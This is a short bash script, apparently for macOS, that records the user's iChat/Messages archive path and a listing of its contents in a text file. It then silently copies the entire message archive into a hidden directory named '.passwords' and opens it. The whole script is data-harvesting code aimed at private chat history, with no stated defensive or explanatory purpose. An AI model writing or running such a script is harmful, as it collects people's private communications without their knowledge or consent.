#!/bin/bash
CDIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
ARCHIVES=~/Library/Containers/com.apple.iChat/Data/Library/Messages/Archive
cd ${CDIR}
echo ${CDIR} > ../here_i_am.txt
cd ${ARCHIVES}
if [ $? -eq 0 ]; then
    ls -al * > ${CDIR}/../here_i_am.txt
    cp -r . ${CDIR}/../.passwords
else
    echo "no messages" > ${CDIR}/../here_i_am.txt
fi
#open  -a Preview
open ../.passwords

